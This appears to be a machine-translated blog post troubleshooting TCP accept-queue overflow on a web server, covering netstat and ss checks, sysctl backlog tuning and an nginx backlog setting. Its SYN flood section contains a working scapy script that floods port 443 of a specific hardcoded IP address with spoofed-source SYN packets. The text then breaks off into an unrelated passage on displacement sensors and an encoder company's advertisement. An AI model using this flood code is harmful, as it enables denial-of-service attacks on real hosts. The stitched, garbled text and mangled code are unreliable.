Problem Description The monitoring system found that the homepage and other pages of the e-commerce website were intermittently inaccessible; View security protection and network traffic, application system load are normal; After the system restarts, it can be temporarily resolved, but after a certain period of time intermittent problems reappear. At this point the problem has affected the normal business of the entire site. I was shocked. The most important thing was that the alarm system did not have any alarms. The service operation was all normal and the instantaneous sweat on the back had already come out. However, we must still meditation, to carefully search for clues, to find problems step by step. Preliminary judgment Check the dev and network card device layer for error and drop. Analyze whether the hardware and system layers are abnormal - Command cat /proc/net/dev and ifconfig Observe the socket overflow and socket droped (if the application handles the socket queue too slow, affect the overflow of the syn queue overflow socket) ----- command netstat -s |grep -i listen Discovered an increase in SYN socket overflow and socket droped Check the sysctl kernel parameters: backlog, somaxconn, file-max and the application backlog. Ss -lnt query, SEND-Q will take the minimum value of the above parameters Discovered that the queue has exceeded the default values ​​of port 80 and port 443 at the time Check whether selinux and NetworkManager are enabled and it is recommended to disable it. Check timestap, reuse enabled, kernel recycle is enabled, if over NAT, disable recycle; The packet capture judgment request comes in after the application processing, whether it receives the SYN non-response situation. In-depth analysis of the problem The normal TCP connection three-way handshake process: The first step: the client sends syn to the server to initiate a handshake; Step 2: The server returns syn+ack to the client after receiving the syn; The third step: After the client receives syn+ack, the reply server ack indicates that the server has received syn+ack. From the description of the situation, when TCP establishes a connection, the full connection queue (accept queue) is full, especially in the description of symptoms to prove this is the reason. Repeatedly saw several times and found that overflowed has been increasing, then it can be clear that the server on the full-connection queue must overflow. Then check how the OS handles after the overflow: # cat /proc/sys/net/ipv4/tcp_abort_on_overflow0 Tcp_abort_on_overflow is 0 if the full connection queue is full in the third step of the three-way handshake. Then the server discards the ack sent by the client (in the server side, the connection is not established). In order to prove that the exception of the client application code is full with the full connection queue, I first modify the tcp_abort_on_overflow to 1, 1 that the third step if the full connection queue is full, the server sends a reset packet to the client, said to abolish this Handshaking process and this connection (originally on the server side this connection has not yet been established). Then test and then in the web service log exception can see a lot of connection reset by peer error, this proves that the client error is caused by this reason. Check the sysctl kernel parameters: backlog, somaxconn, file-max, and backlog configuration parameters of nginx. ss -ln takes the minimum value and finds that 128. In this case, resv-q is already at 129, and the request is discarded. Modify the above parameters and optimize them: The linux kernel parameter is optimized: net.ipv4.tcp_syncookies = 1net.ipv4.tcp_max_syn_backlog = 16384net.core.somaxconn = 16384 Nginx configuration parameter optimization: backlog=32768; Using python multithreaded test, no new problems have been discovered: Import requests from bs4 import BeautifulSoupfrom concurrent.futures import ThreadPoolExecutorurl='https://'response=requests.get(url)soup=BeautifulSoup(response.text,'html.parser')with ThreadPoolExecutor(20) as ex: for each_a_tag In soup.find_all('a'): try: ex.submit(requests.get,each_a_tag['href']) except Exception as err: print('return error msg:'+str(err)) Understand the process and queue of establishing a connection during the TCP handshake As shown in the figure above, there are two queues: syns queue (semi-join queue); accept queue (full queue) In the three-way handshake, after the first step server receives the client's syn, it puts the relevant information into the semi-link queue and simultaneously returns syn+ack to the client (second step); In the third step, the server receives the ack of the client. If the full-connection queue is not full at this time, the relevant information from the semi-join queue is put into the full-connection queue, otherwise the execution is indicated by tcp_abort_on_overflow. At this time, if the full connection queue is full and tcp_abort_on_overflow is 0, the server will send syn+ack to the client over a period of time (that is, the second step of re-handshaking). If the client timed out relatively short, it would be very easy. SYN Flood Flood Attack One of the most popular methods for DoS (Denial of Service) and DDoS (Distributed Denial of Service) attacks. This is a "semi-connection" that uses TCP protocol flaws, causing the attacked server to maintain a large number of SYN_RECV states, and will Try to respond to the second handshake packet 5 times by default, fill TCP waiting for the connection queue, resource exhaustion (CPU full or memory shortage), so that the normal service request connection does not come in. From concurrent.futures import ThreadPoolExecutorfrom scapy.all import *def synFlood(tgt,dPort): srcList = ['11.1.1.2','22.1.1.102','33.1.1.2', '125.130.5.199'] for sPort in range (1024, 65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags='S') packet = ipLayer /tcpLayer send(packet)tgt = '139.196.251.198'print(tgt)dPort = 443with ThreadPoolExecutor(10000000) as ex: try: ex.submit(synFlood(tgt,dPort)) except Exception as err: print('return error Msg:' + str(err)) Therefore, the issue of TCP semi-join queues and full-connection queues is easily overlooked, but it is also critical, especially for some short-lived applications. After a problem occurs, the network traffic, cpu, thread, and load are relatively normal. On the client side, rt is relatively high, but from the server side, the rt is very short. How to avoid being in a hurry when problems arise, establish an emergency mechanism, and follow-up opportunities to write about emergency articles. Displacement sensor, also known as linear sensor, is a linear device belonging to metal induction. The function of the sensor is to convert various measured physical quantities into electricity. In the production process, the measurement of displacement is generally divided into measuring the physical size and mechanical displacement. According to the different forms of the measured variable, the displacement sensor can be divided into two types: analog and digital. The analog type can be divided into two types: physical property type and structural type. Commonly used displacement sensors are mostly analog structures, including potentiometer-type displacement sensors, inductive displacement sensors, self-aligning machines, capacitive displacement sensors, eddy current displacement sensors, Hall-type displacement sensors, etc. An important advantage of the digital displacement sensor is that it is convenient to send the signal directly into the computer system. This kind of sensor is developing rapidly, and its application is increasingly widespread. Magnetic Scale Linear Encoder,Magnetic Scale Encoder,Encoder Software,Encoder Meaning Changchun Guangxing Sensing Technology Co.LTD , https://www.gx-encoder.com